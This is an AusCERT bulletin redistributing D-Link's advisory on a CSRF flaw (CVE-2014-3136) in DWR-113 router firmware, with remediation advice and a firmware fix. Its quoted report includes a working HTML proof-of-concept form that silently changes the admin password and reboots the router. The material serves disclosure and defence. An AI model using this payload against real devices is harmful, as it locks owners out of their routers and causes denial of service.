Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2014.1095 DWR-113 Rev. Ax - CSRF causing Denial of Service - FW v. 2.02 or older 8 July 2014 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: D-Link DWR-113 Rev. Ax firmware Publisher: D-Link Operating System: Network Appliance Impact/Access: Cross-site Request Forgery -- Remote with User Interaction Resolution: Patch/Upgrade CVE Names: CVE-2014-3136 Original Bulletin: http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034 - --------------------------BEGIN INCLUDED TEXT-------------------- Security Advisories > SAP10034 DWR-113 Rev. Ax - CSRF causing Denial of Service - FW v. 2.02 or older Publication ID: SAP10034 Resolved Status: Yes Published on: 2 July 2014 4:34 GMT Last updated on: 2 July 2014 4:43 GMT Overview The DWR-113 Rev. Ax firmware 2.02 and older is susceptible to CSRF vulnerability, which allow an attacker to forge HTML forms and execute actions in an authorized (logged in) browser session. These vulnerabilities allows an attacker to perform denail of service exploits that may cause the device to be unreliable D-Link Security Incident Reponse Policy All public communication on this issue will be offered at http://securityadvisories.dlink.com/security/ Our security response team can be contacted for incident information or to report incidents at security@dlink.com Any non-critical security issue, help in updating firmware, or configuration regarding this issue please contact your D-Link Customer care channel. Reference Author - Blessen Thomas - blessenthomas75@gmail.com CVE-2014-3136 General Disclosure Security and performance is of the utmost importance to D-Link across all product lines. This is not just through the development process but also through regular firmware updates to comply with the current safety and quality standards. We are proactively working with the sources of these reports as well as continuing to review across the complete product line to ensure that the vulnerabilities discovered are addressed. We will continue to update this page to include the relevant product firmware updates addressing these concerns. In the meantime, you can exercise the below cautions to avoid unwanted intrusion into your D-Link product. Immediate Recommendations for all D-Link router customers Do not enable the Remote Management feature since this will allow malicious users to use this exploit from the internet. Remote Management is default disabled on all D-Link Routers and is included for customer care troubleshooting if useful and the customer enables it. If you receive unsolicited e-mails that relates to security vulnerabilities and prompt you to action, please ignore it. When you click on links in such e-mails, it could allow unauthorised persons to access your router. Neither D-Link nor its partners and resellers will send you unsolicited messages where you are asked to click or install something. Make sure that your wireless network is secure. Do not provide your admin password to anyone. If required we suggest updating the password frequently. Description We encourage you to contact the author for further infomation at blessenthomas75@gmail.com. The other can provide furhter details. In order to avoid miscommunication the following is taken directly from the authors report: It was observed that the D-link DWR-113 wireless router is vulnerable to denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability. An attacker could craft a malicious CSRF exploit to change the password in the password functionality when the user(admin) is logged in to the application ,as the user interface (admin panel) lacks the csrf token or nonce to prevent an attacker to change the password. Attacker can manipulate user data via sending him malicious crafted url. As a result, as soon as the crafted malicious exploit is executed the router is rebooted and the user is forced to wait for a few minutes so that the changes could be made in the settings of the router. Now it is observed that even though the attacker's password doesn't work , neither does the user's current password work and the user tries a lot to get logged to the interface admin panel of the router using the user's current password. Finally the user is forced to reset the router's device physically, thus leading to a denial of service condition. Every time the user is forced to reset the device manually which is a cumbersome process. Proof of Concept code (exploit) Restart Router by CSRF <html> <!-- CSRF PoC ---> <body> <form action="http://192.168.0.1/rebo.htm"> <input type="hidden" name="S00010002" value="test" /> <input type="hidden" name="np2" value="test" /> <input type="hidden" name="N00150004" value="0" /> <input type="hidden" name="N00150001" value="" /> <input type="hidden" name="N00150003" value="1080" /> <input type="hidden" name="_cce" value="0x80150002" /> <input type="hidden" name="_sce" value="%Ssc" /> <input type="submit" value="Submit request" /> </form> </body> </html> Affected Products Model Name DWR-113 HW Version Ax Current FW Version v. 2.02 and older New FW Version for this Firmware: v. 2.03b02 exploit fix Release Notes Security patch for your D-Link router These firmware updates address the security vulnerabilities in affected D-Link routers. D-Link will update this continually and we strongly recommend all users to install the relevant updates. As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration. To update the firmware please log-in to the Web-GUI interface of your device, from the menu select Maintanence -> System -> Upgrade Firmware. If you require help please contact your regional D-Link customer care website for options. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBU7tEbRLndAQH1ShLAQLa0hAAjl7CSHNWflVoUzbxCQxmVz4d8Lv6HIXo d/GH3lN4okxjfHdTLQLbMwbjqXG0ZNJKUUntWuxJO5v0FyjVRwUncwNM09rp2Yn1 Um/i2pOC1EgxzutEE6Qatfj91iV4Apb7egy004FpjAAXzDiO3z947aGqGSMvNx9o h+LO03nWJWEQDQ3NJu7mc8tlvdc4LJTSyEUgUDFWEiwbtILYXwMFT5DeYs8oZNMX J7HkWyOxZOzLQW4k4tdL0N3ZNUDyd5vg3w+bFfa+lpPAVZdw0RtdCIBFDAJgR2PI 11xReb1IZb4xwLs5FV+j/joKN4cf+bZKdCLdhUpUEe2iDflpGZYDY7Ew35W8GK7W SLPZAvfoIohYGTtYH14V2DNZ9th+rlDC6VTlv+ZK8k+6apJ3ZyPTXZul6R4SOmNS yBmMCwIK0YmboZHAksWJ9iZw7Y3dvcjpSv2oxhVflYTds2ue5eLoAuGyIdCOrno4 mrMM0kmfm2UmC78r1i/nnDL523jLm71hmwfEUHsUBGz2Nt4gL75xdvBsyKZ/W7Dz rHHGVXwqYOb0WvAzT33m2CHjWbjJ61gvRrsjRvS6+QbzXzzWQxVye/DS053/XwcG qwyHv06KRvaPo2kzIZciCDbL8vpLf6eV/ddC6WcTxyzMxR4YqYHEG04MFKer+G6M Gt5+1JDr0og= =u0Yr -----END PGP SIGNATURE-----